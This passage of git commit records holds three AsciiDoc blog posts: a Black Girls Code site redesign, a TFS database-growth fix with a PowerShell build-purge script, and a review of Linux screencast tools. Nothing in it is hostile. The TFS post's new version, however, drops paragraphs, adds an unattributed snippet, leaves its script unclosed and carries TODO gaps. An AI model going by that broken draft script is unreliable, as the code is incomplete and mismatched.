https:\/\/lh3.googleusercontent.com\/ORoECpNWjVc7MILpWSs6AUliZYEFsW-VIOL8Ghts6e56vCxqP8pMYJ6woARqCcU7w2Zr-83vUc6gry0Tfi9BsCFUd-kA0UpRL1ApzPE05l3V-ovLGnX0ifx0mzLadySEuXaljgxpnaqKsQfGGHdttHeICfrdm2d1vhkfx6B7w-kKFHofWzErkYJqoSGMtZU0OSqpx7WZFdwzx2nPSOD30g45eTKUTHpROzlh9BEpeE-Lhm2a9TaKuiMQv4ppnWfG4Nlh_5q__PQrC_ajxHf-be29Hq6mmfbq5cLfSOMaVV27yE8ZhnhJYa15kEcaRolqWgF-ax50-8HXntiGGIgr-WfYkBu-QohwG8D3WnKb9w8KtFLK0_HF_xqZ8Wtg8-f6dXedEniEUEG-qWTIwvU4I5Mv9jyKrBwxPVF4G8HxoLd-uhD33M13cT-KETVT2rL7zSDI0J0D9bHZEemO8Y6JBk8B1YzH2T1t2tJ1wHSL3DTK_xd6LaAFlBLFC1M2thsUyd1swbkBvIR3HFOmuWHMhcMl3_z7S425IPv8bW7nfmJSVQfJEUlFPf-jEwnbgukFg0sn=w872-h657-no\n:hp-tags: blackGirlsCode, web design, Bootstrap\n\nI am pleased to announce the redesign of the link:blackgirlscode.github.io[GC(2)] site! This is something long overdue and I am very excited about its development. It is almost night and day compared to the previous version and it is a testament to my growth as a developer. When I first took on this project, it took about three weeks and was riddled with errors. I kept seeing this "clearfix" class thrown about and had no clue as to its purpose; so I just deleted it. (Happy to say now I know what it's for.) Plus, I used a template that was poor in design and poorly documented.\n\nUsing Bootstrap was necessary to build, as well as a few jQuery plugins. I feel at times, both are used when a simple boilerplate and vanilla JavaScript would suffice. I myself felt lazy using it to develop a website; but it was necessary to achieve the big-picture results I see for the organization. Plus, time savings had to be considered; this week I am getting my hands dirty test-driving my link:https:\/\/codeschool.com[CodeSchool] subscription that was gifted for Christmas. \n\nThere still are things I'd like to add, such as a schedule of events and the curriculum section for members, but at least for now it is not such an e\u0336m\u0336b\u0336a\u0336r\u0336r\u0336a\u0336s\u0336m\u0336e\u0336n\u0336t\u0336 eye-sore. \n\nFeatures are included that, before, I did not have the know-how to complete. Simple things like an image carousel, a fixed\/collapsed navigation bar, some cool transitions, member profiles and testimonials, etc. \n\nMore to come on this, but so far, so good!","old_contents":"= Introducing the New bGC(2) Site\n:hp-image: https:\/\/lh3.googleusercontent.com\/kHS0i7IG5jOlmhA0vWs1MCCoJ_uZblRpIfVLPVqojDhwuAhlf_Q7Q-Yu3mwT5ojpDQr_2M0YJ7MirCWkNccAeekwetEsXV7hrHMTp22YYPdZE4tvltpzal5fnu0NygITR_mvEf8O58jNqgklSthDKFONm34e9_pQLmTx-nFH3Rhc1XAJwl58XXqo0tphhO3AOWrQhZuFNqtrCxsRMDOczsW0uGN8DOofGGPzMspaBPbP87KENZXSO9Jo9dmF6c7OfjrVLoLcEFPT_RhgSECLXdl9NyEypWPZG8jbmn76KxLFySB5t79ZABYJduhbVB95rbi-uOeNJfu_RTJGjh8QaYErMajyNcaQLjS-a8e1tkZi8DZaFF43334yw0voh2PPQDeFLnQ-G15nvTt881gFMK4Kgiedtviz9c2sGYLTi55t63Ir_BC4C8VMJWq-WwMnYnWyeX0U7gUHVHdxgqZ3H4CwbRNFvNOaE4kabTvfwOkhnHLR-F8LhgxxB8zlXEcZMjHqn-Pz6V4wbyU1ylFGLq_R-_jPrSRCVFAINhDLqfMrySWjvsaLrPyfRP6dSUw526cY=w1307-h657-no\n:hp-tags: blackGirlsCode, web design, Bootsrap\n\nI am pleased to announce the redesign of the link:blackgirlscode.github.io[GC(2)] site! This is something long overdue and I am very excited about it's development. It is almost night and day to the previous version and it is a testament of my growth as a developer. When I first took on this project, it took about three weeks and riddled with errors. I kept seeing this "clearfix" class thrown about and had no clue as to it's purpose; so I just deleted it. (Happy to say now I know whats it's for.) 
Plus, I used a template that was poor in design and poorly documented.\n\nUsing Bootstrap was neccesary to build, as well as a few jQuery Plugins. I feel at times, both are used when a simple boilerplate and Vanilla Javascript would suffice. I myself felt lazy using it to develop a website; but it was neccessary to achieve the big picture results I see for the organization. Plus time-savings had to to be considered; this week I am getting my hands dirty test-driving my link:https:codeschool.com[CodeSchool] subscription that was gifted for Christmas. \n\nThere still are things I'd like to add such as a schedule of events and the curriculum section for members, but at least for now it is not such an e\u0336m\u0336b\u0336a\u0336r\u0336r\u0336a\u0336s\u0336m\u0336e\u0336n\u0336t\u0336 eye-sore. \n\nFeatures are included that, before, I did not have the know-how to complete. Simple things like an image carousel, a fixed\/collapsed navigation bar, some cool transitions, member profiles and testimonials, etc. \n\nMore to come on this, but so far, so good!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b03f5e8dcc5b4b6b3e59b1fcb82ac92501aff372","subject":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","message":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_contents":"= Troubleshooting TFS DB Growth\n:hp-tags: TFS, ReleaseManager\n:published_at: 2017-03-14\n:hardbreaks:\n\n*Spoiler:* This was caused by ReleaseManager 2013 retaining builds. Read on for the workaround that was put in place.\n\nAs part of a project I was working on recently, I put in a lot of work around TFS Builds, Unit\/Integration Tests & continuous delivery using ReleaseManager.\n\nIt was a fairly standard pipeline:\n\u2192 Checkin \u2192 Unit & Integration Tests Run \u2192 Build \u2192 Release To Test\n\nUp until this project the TFS Build feature hadn't been used; TFS was just used for source control and some work item tracking. It was hosted on a VM and didn't take up much space ********TODO The DB for TFS was a SQL Express instance on the TFS VM (it has since been moved off to a physical server with DR).\n\nAfter a few months of the project I started getting reports that the TFS VM size was growing constantly. 
IT had to increase the disk size on the VMs a couple of times.\n\nIt turns out that the VM had grown from ***TODO \n\nAfter doing a little research online I found the following query that gives some insight into which tables are taking up the most space in the db.\n\n[source,sql]\n----\nUSE Tfs_DefaultCollection\n \nSELECT\n t.NAME AS TableName,\n s.Name AS SchemaName,\n p.rows AS RowCounts,\n SUM(a.total_pages) * 8 AS TotalSpaceKB,\n SUM(a.used_pages) * 8 AS UsedSpaceKB,\n (SUM(a.total_pages) - SUM(a.used_pages)) * 8 AS UnusedSpaceKB\nFROM\n sys.tables t\nINNER JOIN \n sys.indexes i ON t.OBJECT_ID = i.object_id\nINNER JOIN\n sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id\nINNER JOIN\n sys.allocation_units a ON p.partition_id = a.container_id\nLEFT OUTER JOIN\n sys.schemas s ON t.schema_id = s.schema_id\nGROUP BY\n t.Name, s.Name, p.Rows\nORDER BY\n TotalSpaceKB desc\n----\n\n\n**TODO table with high storage & explanation\n\n\nNormally TFS retains builds as defined by a build retention policy; ours tells it to keep only the last 10 builds.\nHowever, there is a known issue with Microsoft Release Management 2013 that causes every build that is involved in a release to be retained indefinitely; this doesn't really fit with the continuous delivery model and has been changed in newer versions.\nEvery check-in we do triggers a build, which triggers a release, so all our builds are retained.\n
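To get a sense of the scale before purging, a small query along the same lines as the purge script further down can count the pinned builds for one project. This snippet is not from the original post; it assumes the same TFS client assemblies are loaded and "MyProject" is a placeholder team project name:\n\n[source,powershell]\n----\n# Count builds still flagged KeepForever (i.e. retained by Release Management).\n# Assumes $buildServer was obtained exactly as in the purge script below.\n$spec = $buildServer.CreateBuildDetailSpec(\"MyProject\") # placeholder project name\n$spec.InformationTypes = $null # build records only, no extra information nodes\n$retained = $buildServer.QueryBuilds($spec).Builds | Where-Object { $_.KeepForever }\nWrite-Host \"Builds pinned as Retain Indefinitely:\" $retained.Count\n----\n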
This is not available though the UI and is only available through the API\n\nI setup a build in TFS that runs at 3am every day and runs this scripts as part of the build.\n \n[source,powershell]\n----\nparam ($serverName = 'http:\/\/<snip>:8080\/tfs\/DefaultCollection')\n\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Build.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.VersionControl.Client\")\n$tfs = [Microsoft.TeamFoundation.Client.TeamFoundationServerFactory]::GetServer($serverName)\n\n$buildServer = $tfs.GetService([Microsoft.TeamFoundation.Build.Client.IBuildServer])\n$vcs = $tfs.GetService([Microsoft.TeamFoundation.VersionControl.Client.VersionControlServer])\n\n$projects = $vcs.GetAllTeamProjects($true) # We will run this for all team projects\n\nforeach ($project in $projects){\n Write-Host $project.Name\n\n $buildDefs = $buildServer.QueryBuildDefinitions($project.Name) # Get all the build definitions for a given project\n\n foreach ($buildDef in $buildDefs){\n Write-Host \"-\" + $buildDef.Name\n\t\t$endDate = (Get-Date).AddDays(-14) # Delete all builds older than 14 days. This is a bit aggressive and can be pushed to a month once the logs are smaller on automated builds.\n while($endDate.Year -ge 2014){ # Keep going back until we hit dec 2014\n $year = $endDate.Year\n $month = $endDate.Month\n write-host $year $month\n $buildDetailSpec = $buildServer.CreateBuildDetailSpec($project.Name, $buildDef.Name) # Create a search object for the project\/build def\n $startDate = $endDate.addMonths(-1)\n $buildDetailSpec.MaxFinishTime = $endDate # Search criteria\n $buildDetailSpec.MinFinishTime = $startDate # Search criteria\n $buildDetailSpec.InformationTypes = $null # only build info, not workitems, labels, etc\n\n\t\t\t## This is important for the query, builds that are deletd by retention or the ui are only logically deleted, not destroyed in the db\n $buildDetailSpec.QueryDeletedOption = [Microsoft.TeamFoundation.Build.Client.QueryDeletedOption]::IncludeDeleted \n\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # Search all the things\n if($builds.Builds.Length -ge 1){\n Write-Host \"before update\" $builds.Builds\n foreach($build in $builds.Builds){ # Need to turn off the Keep Forever (Retain) flag set by Release Manager.\n if ($build.KeepForever -eq $true){\n Write-Host \"Updating build \" $build.Uri\n $buildToEdit = $buildServer.GetBuild($build.Uri) # Gets an updatable ref to the build\n $buildToEdit.KeepForever = $false; # Edit the build flag\n $buildServer.SaveBuilds(@($buildToEdit)) # save the build back to the tfs\n }\n }\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # refresh the query given that some of the builds have been updated\n Write-Host \"after refresh\" $builds.Builds\n $buildServer.DeleteBuilds($builds.Builds, [Microsoft.TeamFoundation.Build.Client.DeleteOptions]::All) # Delete the build, test results, symbols, drop, etc.\n $buildServer.DestroyBuilds($builds.Builds) # Destroy the db records\n }\n \n $endDate = $endDate.addMonths(-1) # rolling back the years.\n } \n 
\n\nFor reference, this is the kind of output the space-usage query produces; on our collection, `tbl_Content` and `tbl_TestResult` were far and away the biggest consumers:\n\n|===\n|TableName|SchemaName|RowCounts|TotalSpaceKB|UsedSpaceKB|UnusedSpaceKB\n|tbl_Content|dbo|69733|1889136|1869000|20136\n\n|tbl_TestResult|dbo|174868|323192|321504|1688\n\n|tbl_LocalVersion|dbo|413449|122072|120048|2024\n\n|tbl_BuildCodeChange|dbo|148950|78016|77824|192\n\n|tbl_Version|dbo|101484|68872|68544|328\n\n|tbl_BuildInformation2|dbo|88673|64232|63512|720\n\n|tbl_Command|dbo|92974|39192|38928|264\n|===\n\n++ You can see the output from the script in the Diagnostics tab from the build:\n++ This is where the script is configured: \n++ This is the build trigger:\n\nimage::buildpurge\/dummyproject.png[]\n\n","old_contents":"= Troubleshooting TFS DB Growth\n:hp-tags: TFS, ReleaseManager\n:published_at: 2017-03-14\n:hardbreaks:\n\n*Spoiler:* This was caused by ReleaseManager 2013 retaining builds. Read on for the workaround that was put in place.\n\nAs part of a project I was working on recently, I put in a lot of work around TFS Builds, Unit\/Integration Tests & continuous delivery using ReleaseManager.\n\nIt was a fairly standard pipeline:\n\u2192 Checkin \u2192 Unit & Integration Tests Run \u2192 Build \u2192 Release To Test\n\nUp until this project the TFS Build hadn't been used, TFS was just used for source control and some workitem tracking, it was hosted on a VM and didn't take up much space ********TODO The DB for TFS was a SQL express on the TFS VM (it has since been moved off to a physical server with DR)\n\nAfter a few months of the project I started getting reports that the TFS VM size was growing constantly. IT had to increase the disk size on the VMs a couple of times.\n\nIt turns out that the VM had grown from ***TODO \n\nAfter doing a little research online I found the following query that gives some insight into which tables are taking up the most space in the db.\n\n[source,sql]\n----\nUSE Tfs_DefaultCollection\n \nSELECT\n t.NAME AS TableName,\n s.Name AS SchemaName,\n p.rows AS RowCounts,\n SUM(a.total_pages) * 8 AS TotalSpaceKB,\n SUM(a.used_pages) * 8 AS UsedSpaceKB,\n (SUM(a.total_pages) - SUM(a.used_pages)) * 8 AS UnusedSpaceKB\nFROM\n sys.tables t\nINNER JOIN \n sys.indexes i ON t.OBJECT_ID = i.object_id\nINNER JOIN\n sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id\nINNER JOIN\n sys.allocation_units a ON p.partition_id = a.container_id\nLEFT OUTER JOIN\n sys.schemas s ON t.schema_id = s.schema_id\nGROUP BY\n t.Name, s.Name, p.Rows\nORDER BY\n TotalSpaceKB desc\n----\n\n\n**TODO table with high storage & explanation\n\n\nNormally TFS retains builds as defined by a build retention policy, ours tells it to only keep the last 10 builds.\nHowever, there is a known issue with the Microsoft Release Management 2013 that causes every build that is involved in a release to be retained indefinitely, this doesn't really fit with the continuous delivery model and has been changed in newer versions.\nEvery check in we do triggers a build which triggers a release so all our builds are retained.\n \nThis has issues for the storage capacity on the drops folder where builds are dropped and also storage capacity in the database.\n \nThe issue was exacerbated for this project because of the logging setup in the integration tests. Each test class library gets a DB deployed and dropped and seed scripts run, all the logging from these activities is echoed to the console. 
The application logging is also set to console output.\nAll this log info for each test run is stored in the TFS database which grew unmanageably.\nThe logging was turned off on the automated builds so this should help keep the size down for newer builds\n\n** todo logmanager stuff for builds\n\nTo manage the retained builds I wrote a powershell script that does the following steps for every build older than 2 weeks:\n\n. Update the Retain Indefinitely flag to false\n. Delete the build \n. Destroy the build \n \n*Delete the build*\nThis is what is available through the UI, it is only a logical delete and while it does delete artifacts from the network drop folders, it does not delete rows from the db\n\n*Destroy the build*\nThis is the delete from the db. This is not available through the UI and is only available through the API\n\nI set up a build in TFS that runs at 3am every day and runs this script as part of the build.\n \n[source,powershell]\n ----\n param ($serverName = 'http:\/\/<snip>:8080\/tfs\/DefaultCollection')\n\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Build.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.VersionControl.Client\")\n$tfs = [Microsoft.TeamFoundation.Client.TeamFoundationServerFactory]::GetServer($serverName)\n\n$buildServer = $tfs.GetService([Microsoft.TeamFoundation.Build.Client.IBuildServer])\n$vcs = $tfs.GetService([Microsoft.TeamFoundation.VersionControl.Client.VersionControlServer])\n\n$projects = $vcs.GetAllTeamProjects($true) # We will run this for all team projects\n\nforeach ($project in $projects){\n Write-Host $project.Name\n\n $buildDefs = $buildServer.QueryBuildDefinitions($project.Name) # Get all the build definitions for a given project\n\n foreach ($buildDef in $buildDefs){\n Write-Host \"-\" + $buildDef.Name\n\t\t$endDate = (Get-Date).AddDays(-14) # Delete all builds older than 14 days. 
This is a bit aggressive and can be pushed to a month once the logs are smaller on automated builds.\n while($endDate.Year -ge 2014){ # Keep going back until we hit Dec 2014\n $year = $endDate.Year\n $month = $endDate.Month\n write-host $year $month\n $buildDetailSpec = $buildServer.CreateBuildDetailSpec($project.Name, $buildDef.Name) # Create a search object for the project\/build def\n $startDate = $endDate.addMonths(-1)\n $buildDetailSpec.MaxFinishTime = $endDate # Search criteria\n $buildDetailSpec.MinFinishTime = $startDate # Search criteria\n $buildDetailSpec.InformationTypes = $null # only build info, not workitems, labels, etc\n\n\t\t\t## This is important for the query, builds that are deleted by retention or the ui are only logically deleted, not destroyed in the db\n $buildDetailSpec.QueryDeletedOption = [Microsoft.TeamFoundation.Build.Client.QueryDeletedOption]::IncludeDeleted \n\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # Search all the things\n if($builds.Builds.Length -ge 1){\n Write-Host \"before update\" $builds.Builds\n foreach($build in $builds.Builds){ # Need to turn off the Keep Forever (Retain) flag set by Release Manager.\n if ($build.KeepForever -eq $true){\n Write-Host \"Updating build \" $build.Uri\n $buildToEdit = $buildServer.GetBuild($build.Uri) # Gets an updatable ref to the build\n $buildToEdit.KeepForever = $false; # Edit the build flag\n $buildServer.SaveBuilds(@($buildToEdit)) # save the build back to the tfs\n }\n }\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # refresh the query given that some of the builds have been updated\n Write-Host \"after refresh\" $builds.Builds\n $buildServer.DeleteBuilds($builds.Builds, [Microsoft.TeamFoundation.Build.Client.DeleteOptions]::All) # Delete the build, test results, symbols, drop, etc.\n $buildServer.DestroyBuilds($builds.Builds) # Destroy the db records\n }\n \n $endDate = $endDate.addMonths(-1) # rolling back the years.\n } \n }\n}\n\n----\n\n\n|===\n|TableName|SchemaName|RowCounts|TotalSpaceKB|UsedSpaceKB|UnusedSpaceKB\n|tbl_Content|dbo|69733|1889136|1869000|20136\n\n|tbl_TestResult|dbo|174868|323192|321504|1688\n\n|tbl_LocalVersion|dbo|413449|122072|120048|2024\n\n|tbl_BuildCodeChange|dbo|148950|78016|77824|192\n\n|tbl_Version|dbo|101484|68872|68544|328\n\n|tbl_BuildInformation2|dbo|88673|64232|63512|720\n\n|tbl_Command|dbo|92974|39192|38928|264\n|===\n\n++ You can see the output from the script in the Diagnostics tab from the build:\n++ This is where the script is configured: \n++ This is the build trigger:\n\n\n\n\n\nimage::buildpurge\/dummyproject.png[]\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b56883f942086e6ac5eb4bc1168ae5be439db76e","subject":"Remove massive amount of spaces","message":"Remove massive amount of spaces\n","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_contents":"= Creating screencasts on Linux\n:published_at: 2017-06-21\n:hp-tags: screencasts, Fedora, meta\n\n=== Intro\n\nAs this is a new blog on Fedora Planet, let me start off by introducing myself briefly. My name is Maxim Burgerhout, and I have been a Fedora contributor for quite some time. Truth be told though, I haven't been able to spend much time maintaining my packages over the past couple of years. 
As a different way of giving back, I want to start sharing some experiences with open source software in a specific niche: screencast creation, and video editing.\n\n=== Background\n\nA couple of months back, I started recording screencasts about Red Hat productsfootnote:[I work as a solution architect for Red Hat in the Benelux region]. For now, it's mostly about management products, like Satellite, Ansible Tower and things like that, but I'll potentially also cover other products and projects as they pop up in my daily work, and as said above, I intend to start sharing some experiencesfootnote:[How-to's, why this and not that, and who knows: screencasts ;)] about creating screencasts on Fedora.\n\nAssuming more people are trying to figure out the same things I am, I'm starting off with a short write-up of my experiences so far, trying to work with open source software to create screencasts. Spoiler: it's not as easy as I hoped it would be. \n\nThe article below is based on my experience using Fedora 25.\n\n\n=== Recording video\n\nEver since I started doing this, I've been using http:\/\/screencastify.com\/[Screencastify] as my screen recorder of choice. I have tried using the https:\/\/extensions.gnome.org\/extension\/690\/easyscreencast\/[EasyScreencast] Gnome Shell extension in the beginning, but it had (temporarily) died, so that didn't seem viable. It seems to have revived though, so I'll probably try it again when my Screencastify subscription expires near the end of the calendar year.\n\nI also tried the https:\/\/help.gnome.org\/users\/gnome-help\/stable\/screen-shot-record.html.en[CTRL-ALT-SHIFT-R] option to start a screencast recording in Gnome, but that records both my monitors, which makes editing the whole thing into a YouTube video quite a pain.footnote:[If you know how to limit this to a single monitor, or even better: a single window, I'm all ears!].\n\nFinally, gtk-recordmydesktop gives me all kinds of strange artifacts in my recording when I move my mouse. It also seemed to crash quite frequently, and seems to be dead upstream.\n\nAll options available from the community (the built-in one, gtk-recordmydesktop and EasyScreencast) were disqualified for various reasons, either because of lack of maintenance, quirks or instability.\n\nHowever, apart from the occasional crash (which happens very seldom), Screencastify works beautifully. I can record a window, a Chrome tab, or my whole desktop. Recording my voice over the videos also works pretty well, using a USB microphone I bought for the purpose of creating screencasts.\n\nThe downside of Screencastify is that it's a proprietary piece of software. For now, it's the clear winner, but in the future I'll give EasyScreencast a run for its money again.\n\n\n=== Recording audio on its own\n\nRecording audio on Fedora can be done through various options, of which the two most obvious are https:\/\/wiki.gnome.org\/Design\/Apps\/SoundRecorder[Sound Recorder] and http:\/\/www.audacityteam.org\/[Audacity].\n\nSound Recorder is the default sound recorder app in Gnome 3. It's OK for very simple usage, but the moment you want to start editing audio or improving audio quality using filters, Sound Recorder doesn't offer anything.\n\nAudacity, on the contrary, is *very* complete. It's even a bit intimidating in the amount of options it offers, but in terms of recording quality, editing the recordings and improving their quality, Audacity is the de-facto standard in open source, on Linux as well as on various other platforms. 
Simply said, it's brilliant.\n\nAudacity is the clear winner here, without any real competition.\n\n\n=== Editing video\n\nSo this is where the real pain starts. Safe to say, video editing on Linux was a bit of a disappointment for me.\n\nI have tried all of the major video editing open source projects that are available natively on Fedora: Kdenlive, Pitivi, Avidemux and OpenShot, as well as the commercially available Lightworks.\n\nTo start with http:\/\/fixounet.free.fr\/avidemux\/[Avidemux]: it seems to lack the full broad spectrum of features one would need to edit and merge large amounts of clips into a new video, and insert transitions and background audio. I assume it would work nicely to just crop two videos and slam them together, but it doesn't feel right for more complex things. Granted, I haven't spent a huge amount of time with this program, so let me know if you think I'm dismissing Avidemux too easily. It just wasn't enough for me.\n\nNext up are http:\/\/www.openshot.org\/[OpenShot] and https:\/\/kdenlive.org\/[Kdenlive]. Both great programs, both with extensive feature sets that would suffice for me and both with the same recurring problem that disqualified them: they crash. Over and over. I'll be filing bugs for both, but no matter how that turns out, right NOW, they are not very useful for me. Both seem to have somewhat lively upstreams though, so who knows what the future might bring. \n\nSadly, I've spent too much time trying to get OpenShot and Kdenlive to work, and that kept me from thoroughly evaluating my next contender: https:\/\/git.gnome.org\/browse\/pitivi[Pitivi].\n\nPitivi used to fall into the same category as OpenShot and Kdenlive (crashing), but I haven't experienced any crashes recently. It comes with a nice set of effects, just like OpenShot and Kdenlive, and is fairly easy to use. It exports to all of the right formats, but sadly, rendering of video happens in the foreground. This blocks you from using the program during that process. Not a big deal for a video of a couple of minutes, but annoying for anything longer than that.\n\nThe final program I just had to take a look at is Lightworks. It's not open source, but it really is bloody good. It's by far the most complete of the lot, but it comes at a hefty price. Also, some of the options that are really interesting for making screencasts, like a built-in voice-over recorder, aren't available on Linux :(\n\nI would say for video editing, Pitivi and Lightworks are tied, with Lightworks being the more complete option, and Pitivi being the open source one.\n\n\n=== Conclusion\n\nAudio editing we have under control in open source. Audacity is great. It's just really, really great. (There, enough Trumpianisms for today.)\n\nScreencast recording has come a long way, but hasn't quite reached the level of functionality I needed a couple of months back. It might have grown to that level in the meantime, though. I'll take the time to re-evaluate EasyScreencast and post an update sometime in the Fall.\n\nVideo editing is still a bit of a problem. The commercial option is good, but pretty expensive and obviously not open source. Two of the three main contenders (OpenShot and Kdenlive) have serious stability issues, up to the point that I just gave up on them. Bugs will be filed, but that's not helping me today. Pitivi is a little less complete than both OpenShot and Kdenlive, I think, but does show promise (and doesn't crash that often). 
\n\nAs with EasyScreencast, I'll give Pitivi a second try and hopefully find an open source solution for my video editing problem.\n\nTL;DR if you are looking for a set of tools to record and edit screencasts on Fedora, you probably want to check out EasyScreencast, and use Screencastify as a fall-back option. For audio, there's no way around Audacity. If you can shell out some dough and don't mind a bit of proprietary software, go for Lightworks; otherwise Pitivi will help you overcome most video editing problems.\n\nM\n\n","old_contents":"= Creating screencasts on Linux\n:published_at: 2017-06-21\n:hp-tags: screencasts, Fedora, meta\n\n=== Intro\n\nAs this is a new blog on Fedora Planet, let me start off by introducing myself briefly. My name is Maxim Burgerhout, and I have been a Fedora contributor for quite some time. Truth be told though, I haven't been able to spend much time maintaining my packages over the past couple of years. As a different way of giving back, I want to start sharing some experiences with open source software in a specific niche: screencast creation, and video editing.\n\n=== Background\n\nA couple of months back, I started recording screencasts about Red Hat products.footnote:[I work as a solution architect for Red Hat in the Benelux region]. For now, it's mostly about management products, like Satellite, Ansible Tower and things like that, but I'll potentially also cover other products and projects as they pop up in my daily work, and as said above, I intend to start sharing some experiences.footnote:[How-to's, why this and not that, and who knows: screencasts ;)] about creating screencasts on Fedora.\n\nAssuming more people are trying to figure out the same things I am, I'm starting off with a short write-up of my experiences so far, trying to work with open source software to create screencasts. Spoiler: it's not as easy as I hoped it would be. \n\nThe below article is based on my experience using Fedora 25.\n\n\n=== Recording video\n\nEver since I started doing this, I've been using http:\/\/screencastify.com\/[Screencastify] as my screen recorder of choice. I have tried using the https:\/\/extensions.gnome.org\/extension\/690\/easyscreencast\/[EasyScreencast] Gnome Shell extension in the beginning, but it had (temporarily) died, so that didn't seem viable. It seems to have revived though, so I'll probably try it again when my Screencastify subscription expires near the end of the calendar year.\n\nI also tried the https:\/\/help.gnome.org\/users\/gnome-help\/stable\/screen-shot-record.html.en[CTRL-ALT-SHIFT-R] option to start a screencast recording in Gnome, but that records both my monitors, which makes editing the whole thing into a YouTube video quite a pain.footnote:[If you know how to limit this to a single monitor, or even better: a single window, I'm all ears!].\n\nFinally, gtk-recordmydesktop gives me all kinds of strange artifacts in my recording when I move my mouse. It also seemed to crash quite frequently, and seems to be dead upstream.\n\nAll options available from the community (the built-in one, gtk-recordmydesktop and EasyScreencast) were disqualified for various reasons, either because of lack of maintenance, quirks or instability.\n\nHowever, apart from the occasional crash (which happens very seldom), Screencastify works beautifully. I can record a window, a Chrome tab, or my whole desktop. 
Recording my voice over the videos also works pretty well, using a USB microphone I bought for the purpose of creating screencasts.\n\nThe downside of Screencastify is that it's a proprietary piece of software. For now, it's the clear winner, but in the future I'll give EasyScreencast a run for its money again.\n\n\n=== Recording audio on its own\n\nRecording audio on Fedora can be done through various options, of which the two most obvious are https:\/\/wiki.gnome.org\/Design\/Apps\/SoundRecorder[Sound Recorder] and http:\/\/www.audacityteam.org\/[Audacity].\n\nSound Recorder is the default sound recorder app in Gnome 3. It's OK for very simple usage, but the moment you want to start editing audio or improving audio quality using filters, Sound Recorder doesn't offer anything.\n\nAudacity, on the contrary, is *very* complete. It's even a bit intimidating in the amount of options it offers, but in terms of recording quality, editing the recordings and improving their quality, Audacity is the de-facto standard in open source, on Linux as well as on various other platforms. Simply said, it's brilliant.\n\nAudacity is the clear winner here, without any real competition.\n\n\n=== Editing video\n\nSo this is where the real pain starts. Safe to say, video editing on Linux was a bit of a disappointment for me.\n\nI have tried all of the major video editing open source projects that are available natively on Fedora: Kdenlive, Pitivi, Avidemux and OpenShot, as well as the commercially available Lightworks.\n\nTo start with http:\/\/fixounet.free.fr\/avidemux\/[Avidemux]: it seems to lack the full broad spectrum of features one would need to edit and merge large amounts of clips into a new video, and insert transitions and background audio. I assume it would work nicely to just crop two videos and slam them together, but it doesn't feel right for more complex things. Granted, I haven't spent a huge amount of time with this program, so let me know if you think I'm dismissing Avidemux too easily. It just wasn't enough for me.\n\nNext up are http:\/\/www.openshot.org\/[OpenShot] and https:\/\/kdenlive.org\/[Kdenlive]. Both great programs, both with extensive feature sets that would suffice for me and both with the same recurring problem that disqualified them: they crash. Over and over. I'll be filing bugs for both, but no matter how that turns out, right NOW, they are not very useful for me. Both seem to have somewhat lively upstreams though, so who knows what the future might bring. \n\nSadly, I've spent too much time trying to get OpenShot and Kdenlive to work, and that kept me from thoroughly evaluating my next contender: https:\/\/git.gnome.org\/browse\/pitivi[Pitivi].\n\nPitivi used to fall into the same category as OpenShot and Kdenlive (crashing), but I haven't experienced any crashes recently. It comes with a nice set of effects, just like OpenShot and Kdenlive, and is fairly easy to use. It exports to all of the right formats, but sadly, rendering of video happens in the foreground. This blocks you from using the program during that process. Not a big deal for a video of a couple of minutes, but annoying for anything longer than that.\n\nThe final program I just had to take a look at, is Lightworks. It's not open source, but it really is bloody good. It's by far the most complete of the lot, but it comes at a hefty price. 
Also, some of the options that are really interesting for making screencasts, like a built-in voice-over recorder, aren't available on Linux :(\n\nI would say for video editing, Pitivi and Lightworks are tied, with Lightworks being the more complete option, and Pitivi being the open source one.\n\n\n=== Conclusion\n\nAudio editing we have under control in open source. Audacity is great. It's just really, really great. (There, enough Trumpianisms for today.)\n\nScreencast recording has come a long way, but hasn't quite reached the level of functionality I needed a couple of months back. It might have grown to that level in the meantime, though. I'll take the time to re-evaluate EasyScreencast and post an update sometime in the Fall.\n\nVideo editing is still a bit of a problem. The commercial option is good, but pretty expensive and obviously not open source. Two of the three main contenders (OpenShot and Kdenlive) have serious stability issues, up to the point that I just gave up on them. Bugs will be filed, but that's not helping me today. Pitivi is a little less complete than both OpenShot and Kdenlive, I think, but does show promise (and doesn't crash that often). \n\nAs with EasyScreencast, I'll give Pitivi a second try and hopefully find an open source solution for my video editing problem.\n\nTL;DR if you are looking for a set of tools to record and edit screencasts on Fedora, you probably want to check out EasyScreencast, and use Screencastify as a fall-back option. For audio, there's no way around Audacity. If you can shell out some dough and don't mind a bit of proprietary software, go for Lightworks, otherwise Pitivi will help you overcome most video editing problems.\n\nM\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 